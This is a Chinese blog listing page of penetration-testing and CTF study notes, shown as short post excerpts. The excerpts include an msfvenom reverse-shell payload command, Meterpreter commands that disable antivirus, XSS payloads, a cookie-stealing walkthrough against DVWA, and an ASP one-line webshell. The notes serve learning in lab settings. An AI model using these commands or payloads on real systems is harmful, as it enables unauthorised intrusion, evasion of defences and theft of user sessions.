- 博客(43)
- 收藏
- 关注
RSS订阅原创 43. CTFHub Web_密码口令
1.弱口令1.打开页面链接这里可以使用burp进行暴力破解,输入admin/password,即可获取flag2.默认口令1.打开页面后,发现是亿邮邮件网关,经百度查询,查到默认帐号密码如下,挨个进行尝试后,发现eyougw/admin@(eyou)为帐号密码2.输入帐号密码验证码后,得到flag...
2020-03-23 17:24:21
805
1
原创 42. 记一次搜索框历史记录中的XSS
1.这里的XSS存在于历史记录中,首先在搜索框中输入xss语句:<input value="" οnclick=alert(‘xss’) type=“text”>,但是新打开链接后,页面载入出错2.返回查看搜索记录,点击搜索记录的搜索框,即可弹窗注:这里使用其他的语句也可弹窗:<input name="name" value="" onmouseover=promp...
2020-03-23 15:26:33
1152
原创 41. CTFHub Web_信息泄露(二)
1.GIT泄露1.1 Log1.我们可以使用GitHack进行**.git泄露的利用**,工具下载地址:https://github.com/BugScanTeam/GitHack2.输入命令:python GitHack-master\GitHack.py http://challenge-17166fa2b0cc5f00.sandbox.ctfhub.com:10080/.git3....
2020-03-22 20:50:03
1583
1
原创 40. CTFHub Web_信息泄露(一)
注意:flag提交不成功原因可能有:(1)你提交的flag的首尾处可能有空格清除掉即可;(2)代理没有关掉,故提交不成功;1.目录遍历1.打开链接后,出现以下界面2.点击按钮后,出现以下页面3.尝试每个文件都点进去后会发现某个目录下存在flag.txt,点开即可获取flag值(注:这里的1,2,3,4目录下打开后每个目录下还存在着1,2,3,4四个目录,所以点的时候注意是在哪个目...
2020-03-20 17:23:32
1558
原创 39. CTFHub Web前置技能_HTTP协议
注意:flag提交不成功原因可能有:(1)你提交的flag的首尾处可能有空格清除掉即可;(2)代理没有关掉,故提交不成功;1.请求方式1.打开链接后,出现以下界面,说是使用CTFHUB请求方法后,会提供flag,但是burpsuite好像仅可以修改为POST和GET方法2.故可以使用windows自带的curl命令,-v是详细信息,-X是指定请求方法命令:curl -v -X CTF...
2020-03-19 17:59:24
726
原创 38. Metasploit后渗透攻击:文件系统命令
1.查看目标机的当前目录命令:pwd或者getwd2.查看本地的当前目录命令:getlwd3.列出当前目录的所有文件命令:ls4.切换目录命令:cd5.搜索指定类型的文件命令:search -f *.txt -d c:/6.下载文件命令:download c:\1111.txt /root7.上传文件命令:upload /root/1.php c:/...
2020-03-18 15:32:34
692
原创 37. Metasploit后渗透攻击:Meterpreter系统命令
1.查看系统信息命令: sysinfo2.查看是否为虚拟机命令:run post/windows/gather/checkvm3.查看运行时间命令:idletime4.查看完整网络配置命令:route5.查看当前权限命令:getuid6.关闭杀毒软件命令:run post/windows/manage/killav7.启动远程桌面命令:run post/win...
2020-03-18 11:23:44
2851
原创 36. Metasploit利用17-010时报错Could not make SMBv1 connection
1.报错截图2.解决方法,启用postgresql数据库3.利用成功
2020-03-18 11:14:45
1680
原创 35. Metasploit后渗透攻击:Meterpreter进程迁移
1. Meterpreter优势:a. 纯内存工作模式,不需要对磁盘进行任何写入操作;b. 使用加密通信协议,而且可以同时与几个信道通信;c. 在被攻击进程内工作,不需要创建新的进程;d. 易于在多进程之间迁移;e. 平台通用,适用于Windows、Linux、BSD系统,并支持Intel x86和Intel x64平台2.Meterpreter进程迁移在刚获得的Meterpre...
2020-03-17 16:40:16
3831
1
原创 34. Metasploit通过samba服务获取shell
1.使用nmap扫描端口2.收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload,从扫描结果发现主机运行着Samba 3.x服务输入search samba 命令搜索Smaba的漏洞利用模块3.选择漏洞利用模块因为exploit/multi/samba/usermap_script 模块被标记为“Excellent”,即为最杰出而且时间是最新的,选择次模块进行渗透...
2020-03-13 16:25:16
772
原创 33. Metasploit 模块介绍
1.Auxiliaries(辅助模块)该模块不会直接在测试者和目标主机间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试2.Exploit(漏洞利用模块)漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证...
2020-03-12 15:11:15
652
原创 32. nmap常用脚本
0x01 nmap按脚本分类扫描nmap脚本主要分为以下几类,在扫描时可根据需要设置–script=类别这种方式进行比较笼统的扫描:auth: 负责处理鉴权证书(绕开鉴权)的脚本broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务brute: 提供暴力破解方式,针对常见的应用如http/snmp等default: 使用-sC或-A选项扫描时...
2020-03-11 11:32:55
853
原创 31. phpstudy无法解析php2、php3、phtml等文件
1、php版本切换,切换为5.3版本2、打开配置文件点击其他选项菜单---->打开配置文件---->httpd-conf3、修改配置文件,将红框前面的注释删掉,后面可以加想解析的文件类型,php2、php3等4、重启phpstudy即可重启phpstudy即可...
2020-03-09 15:46:47
6348
10
原创 30. msf制作木马
利用msfvenom创建木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.51 LPORT=3311 -f elf > shell.elf将木马复制到目标主机,并赋予u+x权限攻击机打开msfconsole使用以下模块use exploit/multi/handler设置payloa...
2020-03-09 15:42:40
511
原创 29. 命令执行漏洞
1、介绍命令执行漏洞应用程序有时候需要调用一些执行系统命令的函数,如PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击2、命令执行漏洞利用测试地址:http://127.0.0.1/1.php?ip=127.0....
2020-03-09 15:40:39
392
原创 28. 各类信息收集手段
1、域名信息对应ip收集相关域名对应ip,相关工具:nslookup,一些工具网站子域名收集工具:layer、subDomainsBrutewhois(注册人)信息查询根据已知域名反查,分析出此域名的注册人、邮箱、电话等;工具:爱站网、站长之家、微步在线site.ip138.com、searchdns.netcraft.com;DMitry工具语法:dmitr...
2020-03-09 15:34:23
608
原创 27. 黑客常用端口利用总结
端口服务入侵方式21ftp/tftp/vsftpd文件传输协议爆破/嗅探/溢出/后门22ssh远程连接爆破/openssh漏洞23Telnet远程连接爆破/嗅探/弱口令25SMTP邮件服务邮件伪造53DNS域名解析系统域传送/劫持/缓存投毒/欺骗67/68dhcp服务劫持/欺骗110pop3爆破/嗅探139Samba服务爆破/未授权访问/远程命令执行143Imap协议爆破161SNMP协议爆破/搜...
2020-03-09 15:03:38
964
原创 26、威胁软件、文件、网址在线检测平台
1、微步在线提供网址和文件在线检测,可通过IP、网址、域名和文件进行查询。官网地址:https://x.threatbook.cn/2、virustotalVirusTotal不仅告诉您给定的防病毒解决方案是否将提交的文件检测为恶意文件,而且还显示每个引擎的检测标签(例如I-Worm.Allaple.gen)。URL扫描程序也是如此,大多数扫描程序会区分恶意软件站点,网络钓鱼站点,可疑站点...
2020-03-09 14:56:39
1245
原创 25、ARP扫描工具
1. netdiscover语法:netdiscover -r [range] (-r 表示指定扫描范围)例: netdiscover -r 192.168.86.0/24 注:netdiscover可以被动模式嗅探语法:netdiscover -p2. arp-scan语法:arp-scan [目标]例: arp-scan 192.168.86.134注:圈红处...
2020-03-09 14:55:13
1182
原创 24、渗透测试经验分享(一)_jquerydomxss_burpsuite_AngularJsXSS_20191127
1、burp 有csrf功能,可以构造CSRF POC2、jquery domxss脚本 1.11.3jquerydomexss1.6.1<html><head> <title>jQuery DomXSS test</title> <script type="text/javascript" src="...
2019-11-27 14:20:01
872
原创 23、渗透测试笔记_XSS漏洞利用(打cookie_键盘记录)_20191121
1、利用XSS打cookie打开http://xss.fbisb.com,注册账号登入点击创建项目,点击下一步选择默认模块,选择keepsession,点击下一步将xss注入代码复制打开dvwa靶机,登录后选择xss stored,将复制的xss注入代码复制到message中,点击sign guestbook再次点击xss stored查看...
2019-11-21 12:58:07
1353
原创 22、渗透测试笔记_XSS跨站脚本_20191120
1、XSS介绍xss是一种经常出现在web应用程序中的计算机安全漏洞,是由于web应用程序对用户的输入过滤不严而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采用cookie资料窃取,会话劫持,钓鱼欺骗等攻击手段2、XSS的危害网络钓鱼,包括盗取各类的用户账号窃取用户cookie窃取用户浏览会话强制弹出广告...
2019-11-20 17:08:54
631
原创 21、渗透测试笔记_文件上传&&解析漏洞_20191118
1、文件解析漏洞解析漏洞主要说的是一些被IIS、Apache、nginx在某种情况下解释成脚本文件格式的漏洞1.1、IIS 5.x/6.0解析漏洞(两种解析)1)目录解析 /xx.asp/xx.jpg在网站下建立文件夹的名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行;2)文件解析 a.asp;.jpg在IIS6.0下,分号...
2019-11-18 10:50:12
581
原创 20、渗透测试笔记_webshell制作_20191114
1、webshell种类一句话木马小马大马打包马脱裤马等等2、一句话木马2.1、介绍一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用<%excute request("value")%>2.2、工作原理黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:<%excute request("val...
2019-11-14 17:55:13
1240
原创 19、渗透测试笔记_SQLMAP_20191112
1、SQLMAP介绍sqlmap是一个由python语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具可检测数据库:access、mssql、mysql、orcale、postgresql、db2、sqlite等可进行sql盲注、union查询、显错注入、延迟注入、post注入、cookie注入等其他功能:执行命令、列举用户、检测权限、自动破...
2019-11-13 09:35:08
648
原创 18、渗透测试笔记_其他注入_20191111
1、常见的提交方式方法描述GET请求指定的页面信息,并返回实体主体HEAD类似GET请求,只不过返回的响应中没有具体的内容,用于获取报头POST向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。POST请求可能会导致新的资源的建立和/或已有资源的修改PUT从客户端向服务器传送的数据取代指定的文档的内容DELETE...
2019-11-11 16:30:36
471
原创 17、渗透测试笔记_SQL注入(2)_20191108
1、Mysql简单的操作命令创建数据库create database database-name;删除数据库drop database dbname;创建新表create table mystable(name varchar(20),sex char(1));查看数据库show database;2、Mysql函数函数功能syste...
2019-11-08 11:46:50
389
原创 16、渗透测试笔记_SQL注入(1)_20191106
1、Mysql服务、端口、后缀1.1、服务重启服务,使其生效:service.msc1.2、端口TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING1.3、后缀1.mdf-----------------数据库文件1_log.ldf-------------数据库日志文件2、常见语句2.1、创建数据库CREATE DATABASE d...
2019-11-06 16:58:37
400
原创 15、渗透测试笔记_数据库注入_20191023
1、网站分类1.1、静态网页:html或者htm,是一种静态的页面格式,不需要服务器解析其中的脚本。由浏览器如(IE、Chrome等)解析。不依赖数据库灵活性查,制作、更新、维护麻烦交互性较差,在功能方面有较大的限制安全,不存在SQL注入漏洞1.2、动态网页:asp、aspx、php、jsp等,由相应的脚本引擎来解释执行,根据指令生成静态网页依赖数据库灵活性好,维护方便交互...
2019-10-23 16:24:35
487
原创 14、渗透测试笔记_网站暴库_后台cms 20191022
1、网站暴库漏洞1.1、定义暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。黑客在得到网站数据库后,就能得到网站管理账号,对网站进行破坏与管理,黑客也能通过数据库得到网站用户的隐私信息,甚至得到服务器的最高权限。1.2、暴库利用方法inurl:/inc/conn.asp inurl:/inc+conn.asp to parent diretory int...
2019-10-22 16:56:59
1148
原创 13、渗透测试笔记_NMAP_AWVS使用 20191016
1、NMAP1.1、主机探测扫描单个主机namp 192.168.1.2扫描整个子网nmap 192.168.1.1/24扫描多个目标nmap 192.168.1.2 192.168.1.5扫描一个范围内的目标nmap 192.168.1.1-100扫描一个txt文件中的ip地址列表nmap -iL target.txt查看扫描的所有主机列表nma...
2019-10-17 15:54:04
2010
1
原创 12、渗透测试笔记_信息收集 20191014
1、域名信息对应ip收集相关域名对应ip,相关工具:nslookup,一些工具网站子域名收集工具:layer、subDomainsBrutewhois(注册人)信息查询根据已知域名反查,分析出此域名的注册人、邮箱、电话等;工具:爱站网、站长之家、微步在线site.ip138.com、searchdns.netcraft.com;2、敏感目标收集方向r...
2019-10-14 15:41:05
542
原创 11、常见协议端口号 20191011
1、常见IP协议号协议IP协议号协议IP协议号ICMP1RSVP46IGMP2GRE47IPv44ESP50TCP6AH51IGRP9EIGRP88UDP17OSPF89IPv641VRRP1122、常见UDP端口号应用UDP端口号应用UDP端口号WINS42...
2019-10-11 11:07:49
1496
原创 10、Linux基础-常用命令(二)20191010
1、文本编辑器Vim常用操作1.1、插入命令命令功能a在光标所在字符后插入A在光标所在行尾插入i在光标所在字符前插入I在光标所在行首插入o在光标下插入新行O在光标上插入新行1.2、 定位命令命令功能:set nu设置行号:set nonu取消行号gg到第一行G到最后一行:n...
2019-10-10 11:22:00
349
原创 9、Linux基础-常用命令(一)20191009
1、文件处理命令ls 查看文件-a 查看所有文件,包括隐藏文件-l 查看详细信息-d 查看目录属性-i 看节点mkdir 创建新目录-p 递归创建rmdir 删除空目录cp -r 复制目录-p 保留文件属性mv 剪切文件、改名rm -r 删除目录-f 强制执行删除pwd 查看当前目录touch 创建一个文件cat 浏览短文件-...
2019-10-09 17:30:21
363
原创 8、Linux基础-目录结构 20191009
1、标准目录结构图解2、Linux目标结构/: 根目录,一般根目录下只存放目录,不用存放文件,/etc、/bin、/dev、/lib、/sbin应该和根目录放置一共分区中/bin:/usr/bin: 可执行二进制文件的目录,如常用的命令ls、tar、mv、cat等。/boot: 放置linuxit启动时用到的一些文件。/boot/vmlinuz为linux的内核文件,以及/boot/g...
2019-10-09 15:35:00
409
1
原创 7、nmap简介 20191008
1、主机发现-sL:列表扫描,反列出指定网络上的每台主机,不发送任何报文给目标-sP:ping扫描,发送ICMP报文到目标主机段,打印响应主机-P0:无ping扫描,跳过主机发现,直接进行深层次的扫描2、端口扫描-sS:TCP SYN扫描,执行快,不与目标建立TCP连接-sT:TCP扫描-sU:UDP扫描-sA:TCP ACK扫描,不能用于判断目标主机开放的端口,但可用于发现...
2019-10-08 14:42:02
365
原创 6、sql注入漏洞 20190930
1、漏洞介绍1.1、定义:sql注入是通过sql命令插入到web表单提交,输入域名或页面请求中的查询字符串,最终达到欺骗服务器执行恶意sql命令的目的。具体来说,它是利用现有应用程序,将恶意的sql命令注入到后台数据库引擎执行的能力,它可以通过web表单中输入恶意sql语句得到存在安全漏洞的网站上的数据库信息,而不是让网站按照设计者意图去执行sql语句。1.2、产生条件:服务器未对...
2019-10-08 14:38:20
467
原创 5、CSRF漏洞(跨站请求伪造) 20190929
1、定义CSRF通过伪装来自受信任的用户的请求来利用受信任的网站,通过一个包含恶意请求的图像利用已验证过的用户身份实现恶意请求2、产生条件HTTP请求中未添加Token字段验证(HTTP协议无状态的)已经登录并授权信任网站A,并在本地生成cookie在不退出网站A的情况下访问网站B,网站B中包含了一条指向网站A的敏感操作的链接3、漏洞危害攻击者可盗用你的身份,以...
2019-10-08 14:34:55
565
原创 4、测试基础笔记 20190928
1、常用属于介绍脚本(asp、php、html)html(css、js、html)HTTP协议CMS(B/S)MD5肉鸡、抓鸡、跳板一句话、小马、大马、webshell、提权、后门源码打包、脱裤嗅探、rookitpoc漏洞验证、exp漏洞利用2、HTTP协议(超文本传输协议:HTTP,HyperText Transfer Proto...
2019-10-08 11:38:03
386
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人